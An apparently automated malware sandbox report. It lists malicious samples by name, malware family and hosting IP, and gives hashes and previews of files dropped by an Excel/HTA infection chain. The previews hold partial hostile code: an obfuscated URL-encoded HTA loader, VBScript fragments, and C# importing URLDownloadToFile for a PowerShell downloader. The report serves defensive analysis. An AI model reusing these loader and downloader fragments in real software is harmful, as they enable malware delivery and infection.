                                                                                                                              New order.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              Signert kontrakt og faktura.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              HUMBER-COLLEGECAseethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              SAMPLE_PHOTO.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              Order_Confirmation.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              GARANT-PARK-INTERNETRU0HUxKfIvSV.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                              • 46.173.214.92
                                                                                                                              0HUxKfIvSV.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                              • 46.173.214.92
                                                                                                                              9xNI7vE1XO.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                              • 46.173.214.92
                                                                                                                              9xNI7vE1XO.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                              • 46.173.214.92
                                                                                                                              bacon.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                              • 46.173.214.102
                                                                                                                              UfRKIdsNvD.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                              • 46.173.214.92
                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                              • 46.173.214.86
                                                                                                                              Lisect_AVT_24003_G1B_122.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 46.173.211.166
                                                                                                                              OYSVIdqcxa.exeGet hashmaliciousGlupteba, LummaC Stealer, RedLine, SmokeLoader, zgRATBrowse
                                                                                                                              • 91.203.193.134
                                                                                                                              hmxXVdsB8n.exeGet hashmaliciousTofseeBrowse
                                                                                                                              • 46.173.215.52
                                                                                                                              NETCUP-ASnetcupGmbHDEPayment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              ickTGSF56D.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 37.120.186.122
                                                                                                                              63w24wNW0d.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 152.89.107.62
                                                                                                                              XzCRLowRXn.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 46.232.250.51
                                                                                                                              Signert kontrakt og faktura.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              New order.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              AS-COLOCROSSINGUSPayment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                              • 192.3.243.136
                                                                                                                              Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                              • 192.3.243.136
                                                                                                                              seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                              • 192.227.228.36
                                                                                                                              FRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                                                                              • 192.227.228.36
                                                                                                                              Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                              • 192.227.228.36
                                                                                                                              kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                                              • 192.3.243.136
                                                                                                                              bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                                                                              • 192.3.243.136
                                                                                                                              Signert kontrakt og faktura.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 107.173.4.61
                                                                                                                              New order.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 192.3.220.29
                                                                                                                              Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                              • 192.3.243.136
                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              05af1f5ca1b87cc9cc9b25185115607dOrder_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              INV-#000497053.docGet hashmaliciousUnknownBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              http://xoilacxd.ccGet hashmaliciousUnknownBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              Order_Confirmation.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              Bank Swift Copy 2.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              blhbZrtqbLg6O1K.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              7dcce5b76c8b17472d024758970a406bPayment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              Signert kontrakt og faktura.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              New order.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              Signert kontrakt og faktura.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              New order.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              purchase order (2).xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              C:\Users\user\AppData\Roaming\vtjrhjiLdegwikhzs.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                SecuriteInfo.com.W32.MSIL_Agent.GJP.gen.Eldorado.13778.95.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                  SecuriteInfo.com.W32.MSIL_Agent.GIL.gen.Eldorado.20044.1173.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                    P.O_2023-0394.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                      SecuriteInfo.com.W32.MSIL_Kryptik.JML.gen.Eldorado.26148.25502.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                        SecuriteInfo.com.Trojan.Mardom.MN.9.13268.1323.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          INVOICE_23DF-48609002.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            SHIPPING_DOCUMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                              Shipping_documents_SST2112-250.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                SecuriteInfo.com.W32.MSIL_Agent.GIL.gen.Eldorado.30277.9800.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4742
                                                                                                                                                  Entropy (8bit):4.8105940880640246
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
                                                                                                                                                  MD5:278C40A9A3B321CA9147FFBC6BE3A8A8
                                                                                                                                                  SHA1:D795FC7D3249F9D924DC951DA1DB900D02496D73
                                                                                                                                                  SHA-256:4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
                                                                                                                                                  SHA-512:E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):64
                                                                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:@...e...........................................................
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):182569
                                                                                                                                                  Entropy (8bit):2.3478224513716413
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:4vahW5oZz7eWLB2ZfywyQhhY1ywyQbD6ngS5RJCS0d399Dd5nCYmIYZAjo3ueufc:4vCl17ZtQjtQhVFlfnnCO4AjovtQX5Q
                                                                                                                                                  MD5:05DCFFE1D8E8E209A90B522192AD8000
                                                                                                                                                  SHA1:77C19B392D39BCE4906B5C4E5F1AB0A0C9182DC7
                                                                                                                                                  SHA-256:35717C891450767AF251EC90A7C05FFD407D7B2D2897D96C176C51B5B8A156B5
                                                                                                                                                  SHA-512:11EAFD5F126BB4873EC7BE1DC6FE7246F3DE8324C413073BC914827695ED1DB1BB9B6E870414C0D4ABA990A6A817D6C029F7AA02E5061434DCDB965A378B5734
                                                                                                                                                  Malicious:true
                                                                                                                                                  Yara Hits:
                                                                                                                                                  • Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat[1].hta, Author: Joe Security
                                                                                                                                                  Preview:<script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%252522%2525253C%25252521DOCTYPE%25252520html%2525253E%2525250A%2525253Cmeta%25252520http-equiv%2525253D%25252522X-UA-Compatible%25252522%25252520content%2525253D%25252522IE%2525253DEmulateIE8%25252522%25252520%2525253E%2525250A%2525253Chtml%2525253E%2525250A%2525253Cbody%2525253E%2525250A%2525253CsCRipt%25252520TYPE%2525253D%25252522TExt/vbsCrIpt%25252522%2525253E%2525250AdIM%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (377), with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):141308
                                                                                                                                                  Entropy (8bit):3.677460277464518
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:DBkSUTu5S/BV4Mf8mOZG3WVGwB7xW9xjqGuvcQ6T0+gt5pzBGwm:mSU/B2e8muG3WQwNjG4cQ6TZgt5p9Gwm
                                                                                                                                                  MD5:855D024750A1BC1BC078E60C05E506E3
                                                                                                                                                  SHA1:480C344EF4E060ADB7CA7E159C815CB38AC87614
                                                                                                                                                  SHA-256:560327E8E4C818547FE966C8704D97270986B7457D62A154219E81ED4AFB4667
                                                                                                                                                  SHA-512:64A68DD3C8750E7A90C95078DC1DB87086C546212B56348E6D45F4444B5DD7E6725F3B5DDBC2C414D08A7DF2FBF2EECD11B9AB414588AC7B66F57F70FBB85C94
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..........F.u.n.c.t.i.o.n. .e.n.g.o.m.a.d.e.l.a.(.B.y.V.a.l. .c.o.r.n.o.f.o.n.e.,. .B.y.V.a.l. .m.o.q.u.e.n.c.o.,. .B.y.V.a.l. .a.p.r.e.s.a.r.)..... . . . .D.i.m. .a.s.s.e.n.t.i.m.e.n.t.o..... . . . .a.s.s.e.n.t.i.m.e.n.t.o. .=. .I.n.S.t.r.(.c.o.r.n.o.f.o.n.e.,. .m.o.q.u.e.n.c.o.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .a.s.s.e.n.t.i.m.e.n.t.o. .>. .0..... . . . . . . . .c.o.r.n.o.f.o.n.e. .=. .L.e.f.t.(.c.o.r.n.o.f.o.n.e.,. .a.s.s.e.n.t.i.m.e.n.t.o. .-. .1.). .&. .a.p.r.e.s.a.r. .&. .M.i.d.(.c.o.r.n.o.f.o.n.e.,. .a.s.s.e.n.t.i.m.e.n.t.o. .+. .L.e.n.(.m.o.q.u.e.n.c.o.).)..... . . . . . . . .a.s.s.e.n.t.i.m.e.n.t.o. .=. .I.n.S.t.r.(.a.s.s.e.n.t.i.m.e.n.t.o. .+. .L.e.n.(.a.p.r.e.s.a.r.).,. .c.o.r.n.o.f.o.n.e.,. .m.o.q.u.e.n.c.o.)..... . . . .L.o.o.p..... . . . ..... . . . .e.n.g.o.m.a.d.e.l.a. .=. .c.o.r.n.o.f.o.n.e.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...A.t.E.n.d.O.f.S.t.r.e.a.m..... .
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3191264
                                                                                                                                                  Entropy (8bit):2.0118490192617995
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:nA0Ki15RlURvLuky+NkuCVAKERludvLuk0Vgk9CVnOKAOK1:P5RlMHk5ERlyDkr8a
                                                                                                                                                  MD5:04A17584C7203C47419D4AC2163B98C6
                                                                                                                                                  SHA1:485E17A82AE4672AC8D4B542CA0F509B80C0C4DF
                                                                                                                                                  SHA-256:EBA2B7C929B2EAA16FB1F733B7ACDDDFD80635A7211B3FBE400FF2796C17827E
                                                                                                                                                  SHA-512:043092951F27E81FF96DA084E8112107D6F00DAEE83ADA80132BEC696E56309D16FDDED39F7F3810CA58BB6357CC6A75718CDD2F7B4342CF82D0421B7681A88C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:....l...........@................S...".. EMF.....0.....#...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.................P.....%.....................P.....................................L...d.......<.......m.......<.......2...!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):7440
                                                                                                                                                  Entropy (8bit):5.6312448977812695
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:PV1Ipi7blJaXn/08zDefAm/luoOHo6MiDbDda91RjTBbPxmPAWmOHDx:PVxvTNAK4oOIGbK1RvVwPAWmOHDx
                                                                                                                                                  MD5:DEA1DEA8BEA479821FA2AC1C565B6E56
                                                                                                                                                  SHA1:86865637336A9FEFA98AC5ABD189A848BE8852D4
                                                                                                                                                  SHA-256:64832E2264B5A851EE2CC7E048DA437D6F41B1C3DCAA385971DAA1B502A11125
                                                                                                                                                  SHA-512:1E1858F58748BF88DAB254F524943AC2C8576B4546AA67E37DFFE8917396A1CCCBA3964554AA77C599DD1CA184A56B8AFC3406A14C880A1B88D163EB04BACA1C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:....l........... ...<...........w....... EMF................................8...X....................?..............................@...C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.......d............................Xt....\.............L...7.Xt........].v?.Xt......Xt.......w8.....9............w....$.......d...........*XYt.....XYtH...8....d....9.-...4...6=.w................<.fv.[Sw....X..V..............................Twdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3064680
                                                                                                                                                  Entropy (8bit):1.8507381356738084
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:NaeRlcBvLukyV6kTCVQKERludvLuk0Vgk9CVX:oeRlM7kmERlyDku
                                                                                                                                                  MD5:93774BB9AECD3837D6496AE965D1BD80
                                                                                                                                                  SHA1:AE60D6A30E74BB5BE492CA71B82205D5C6B850C4
                                                                                                                                                  SHA-256:6CDB58A3C6906A6DD49DB83340ACC7AF0B7C7BBA5C01D8B0A9F562AEBDC85897
                                                                                                                                                  SHA-512:3810C4CDE003BAF916D626A41C0534BF421F5CDBF64D897F385FEDA36F556B6FECC27DB294A39F89C82DF0570424DE2EBB789E0B2294D42BFF80A64756257BD6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:....l............................]..WT.. EMF....h...........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................2......."...........!...............................................2......."...........!...............................................2......."...........!...............................................2.......'.......................%...........................................................L...d.......L.......!.......L...........!..............?...........?................................L...d...y...Y...........y...Y.......[...!..............?...........?................................'.......................%...................................&...
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1296688
                                                                                                                                                  Entropy (8bit):3.5918180538443347
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:M0fH3s01u2uIfTlw35Yjkndm9wHiT53ZkyOmCl6PV2yuxOK3OKP:P3WQTi35XH1RW7vZM
                                                                                                                                                  MD5:27D7A82B9C7722733A57878EE4EFE804
                                                                                                                                                  SHA1:7113615A436D13552335B03E2D1745B891533D78
                                                                                                                                                  SHA-256:2A3C135D49FC9164BEA151BC295AAB90337D319E7F81240A9A6AFACF04212FF0
                                                                                                                                                  SHA-512:ECA1126DDFCF0DAB57FBF0ADB958AC3784A054D782ABFD7E6F7373D4EA019C0D91B32BFEE3C078E3AD50AEC7DC2F71722D960A87F5DE4A5B00BDFD98217253FD
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:....l...........................6[...%.. EMF....0.......$.......................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.................P.....%.....................P.....................................L...d.......1.......Z.......1.......*...!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1504468
                                                                                                                                                  Entropy (8bit):1.7693060102813485
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:L+6i9zy7v2/uEB1A/meRlmRYT9FANxg2WUZUKdRLuk0VgHPLk9CVi:LKERludvLuk0Vgk9CVi
                                                                                                                                                  MD5:EF3C18CC49B02153C770DB977B2E7435
                                                                                                                                                  SHA1:D436E0F820DDBBA10DB4D3F1243ED3AA6468C057
                                                                                                                                                  SHA-256:F328FB5B6055B687344190BB13D8DD6CDF6EA76D4AAAE6C5112DEC1B32ACE3C2
                                                                                                                                                  SHA-512:2081EF5EE87A360894B8726494F30DFEEFF7D922E733D2E633A3D010DE56C6A4CAEADEEBE4CD12A28658AE250ADE3B093F2FAB032B92A31D511D9C99A12AF337
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:....l...........I...R............:...).. EMF................................8...X....................?...........................................:...)..........J...S...Q...............I...R...................J...S...P...(...x........... ....:...)..(...J...S.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (355)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):472
                                                                                                                                                  Entropy (8bit):3.7725208644149166
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:V/DsYLDS81zuE40zmMm/nQXReKJ8SRHy4H+J4EEJ4rNgueIy:V/DTLDfuER5XfHCzETueIy
                                                                                                                                                  MD5:1A212B8A44924D84EEBA108F2409B5E8
                                                                                                                                                  SHA1:B19066FAB9C3329CD206958DACEE65A08607586B
                                                                                                                                                  SHA-256:977B687CCDCAEA25B4AFDD04DBAC19BF12B31AFAD4AE226D7B7E5ED5CABCF073
                                                                                                                                                  SHA-512:4D4BBADA1880CE68CEEAFF34A1D412350F715C0F5F741F7F47692549280DC92738881CE1FFF7BBCD472610A63D99DED94CA713CC859B330A07D13DF2313EA453
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace lxsBtSMPv.{. public class dzTk. {. [DllImport("UrlMON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr dnHrLo,string jlWMht,string L,uint UDwRBXCS,IntPtr qEKvq);.. }..}.
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):369
                                                                                                                                                  Entropy (8bit):5.204671018092592
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fPRWVJfPzxs7+AEszIP23fPRWVJfK:p37Lvkmb6KzhwfPWZEohwfK
                                                                                                                                                  MD5:49059432C987AFDF55C5A0571EB19A0F
                                                                                                                                                  SHA1:3D8B2072C312390F32A3EBA1DF0465BCE36C0E47
                                                                                                                                                  SHA-256:8591ACC67744720ED8EB15E882A9DDA7C383972F492A66E784B186BBDF78ED21
                                                                                                                                                  SHA-512:98CD8ADB6667B9F19780FD6DDBC5DC19FAAE72E9D2E7885D1440E730FA8E9642A6E52F282BFF59BAE89D8799FF2A2827FDD8603D1AF6EB046CD72E728B9490CF
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.0.cs"
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3072
                                                                                                                                                  Entropy (8bit):2.815848322961813
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:etGSkPBu5exl8sMQgkg4qvEStZwtkZfTmjcUWI+ycuZhNtakSLPNnq:67sx+FT4CEStZXJTmA31ulta3hq
                                                                                                                                                  MD5:39D0B927E653EFD82F02329F4E845828
                                                                                                                                                  SHA1:9960A141AAB887C3DAC28500BCB94CC8A247A12F
                                                                                                                                                  SHA-256:BD601FF851C8DED98E112463CDA183E4FBA474C7B5C3040A4864410941001B60
                                                                                                                                                  SHA-512:1F3FF8A00A20818F745AA725660059215CE009ECF5216718D5DFD1E8F0E535CAF8A3D72ADCBE361761B51A0F22A1547A398FD9834AD09EC1042A333FBB1B381A
                                                                                                                                                  Malicious:true
